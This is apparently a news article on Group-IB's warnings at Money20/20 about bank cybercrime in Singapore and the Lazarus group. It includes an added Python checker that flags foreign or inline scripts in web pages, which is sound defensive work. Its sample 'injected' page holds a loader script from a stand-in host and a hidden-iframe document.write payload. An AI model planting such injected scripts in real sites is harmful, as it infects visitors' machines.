As Southeast Asia's leading financial hub, Singapore has become a favorite target for cybercrime and data breaches. At Money20/20, an annual event focused on financial technology and financial services, cybercrime prevention was high on the agenda. Threat-intelligence firm Group-IB used the summit to emphasize the exposure Singapore's banks face, which it expects to grow year on year. One concrete case: in 2018, roughly 19,928 stolen payment cards issued by Singapore-based banks were put up for sale on dark web markets.
Group-IB also attributes activity in the region to the infamous Lazarus group, the North Korean state-sponsored hacking team that is active across Southeast Asia. It claims Lazarus was behind the RATv3.ps trojan (a Remote Administration Tool), which has allegedly been used for cyber espionage for at least three years, and links the same group to the Ratankba trojan, which was delivered through compromised websites and infected the visitors of those sites.
The membership of the Lazarus group is unknown; nobody has published information on where its operators actually are or what its next campaign will be. The North Korean government has for some time denied funding a hacking group of its own. One thing is certain, however: Lazarus runs well-funded campaigns, since developing malware, building attack tooling and discovering vulnerabilities in the targets' systems all take considerable resources.
“So in case of Lazarus, a stitch in time saves nine. It is very hard to contain their attacks as they happen. You have to be well prepared and know their tactics and tools. In particular, it is extremely important to have the most up-to-date indicators of compromise, unavailable publicly, that can only be gathered through automated machine learning-powered threat hunting solutions. Given the group’s increased activity in the region in 2018, we believe that Lazarus will continue to carry out attacks against banks, which will result in illicit SWIFT payments, and will likely experiment with, primarily focusing on Asia and the Pacific,” explained Dmitri Volkov, Group-IB’s Head of Threat Intelligence team.
Lazarus is well versed in cyber espionage and relies on custom command-line tooling developed in-house. One of its favored techniques is compromising legitimate websites and injecting malicious code into them (a watering-hole attack): any visitor running an unpatched, poorly maintained browser can then be infected with a trojan that gives the attackers persistent access to, and deep visibility into, the victim's machine.
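The injection described above leaves a trace in the served HTML: a `<script>` tag the site owner never put there, typically loading from a foreign host or carrying an inline payload. The following is an added example (not code from the article or from Group-IB) of how a site owner could check a fetched page against an allowlist of script hosts. The hostnames, the allowlist and both sample pages are constructed for the example and are not taken from any real incident.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts from which this hypothetical site legitimately loads scripts
# (constructed for the example; a real deployment would use its own list).
ALLOWED_SCRIPT_HOSTS = {"www.example-bank.sg", "cdn.example-bank.sg"}


class ScriptCollector(HTMLParser):
    """Collects every <script> tag: external ones by src, inline ones by body."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of each external script
        self.inline = []        # body of each inline script
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            # Inline script: the parser treats its body as CDATA, so
            # handle_data receives the raw JavaScript until </script>.
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (foreign_srcs, inline_bodies) the page owner did not expect.

    Relative src values resolve to the site's own origin and are accepted;
    absolute and protocol-relative URLs must point to an allowed host.
    Every inline script is reported, since the page is assumed to ship none.
    """
    collector = ScriptCollector()
    collector.feed(html)
    foreign = []
    for src in collector.external:
        host = urlparse(src).netloc      # works for http://, https:// and //host/path
        if host and host.lower() not in allowed_hosts:
            foreign.append(src)
    return foreign, collector.inline


# Constructed sample: the page as the site owner published it.
CLEAN_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-bank.sg/jquery.min.js"></script>
</head><body><p>Welcome</p></body></html>"""

# Constructed sample: the same page after a watering-hole style injection,
# with one foreign-hosted loader and one inline script writing a hidden iframe.
INJECTED_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-bank.sg/jquery.min.js"></script>
</head><body><p>Welcome</p>
<script src="//stats-collector.example/wh.js"></script>
<script>document.write('<iframe src="http://stats-collector.example/x" width=0 height=0></iframe>');</script>
</body></html>"""


def main():
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        foreign, inline = find_suspicious_scripts(page)
        print(f"{name}: {len(foreign)} foreign script(s), {len(inline)} inline script(s)")
        for src in foreign:
            print("  foreign src:", src)
        for body in inline:
            print("  inline:", body[:80])


if __name__ == "__main__":
    main()
```

Run periodically against a fresh fetch of each public page (or against the files on the web server) and alert on any non-empty result; the allowlist check catches the loader, while reporting every inline script catches payloads that avoid an external host altogether.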
“According to Group-IB Hi-Tech Crime Trends report 2018, Lazarus — unlike most other state-sponsored threat actors — does not shy away from attacking crypto. Singapore, being one of the most crypto-friendly countries in the world, attracts not only thousands of crypto and blockchain entrepreneurs every year, but also threat actors willing to grab a piece of the pie. We expect that other APTs like Silence, MoneyTaker, and Cobalt will stage multiple attacks on cryptocurrency exchanges in the near future,” added Volkov.
System administrators, and IT staff generally, were cautioned against the common habit of deferring application and operating system updates under the “if it isn't broke, don't fix it” principle. In a corporate environment that principle is dangerous: unpatched browsers and plugins are exactly what the drive-by infections described above depend on. This was one of the takeaways from the Money20/20 summit.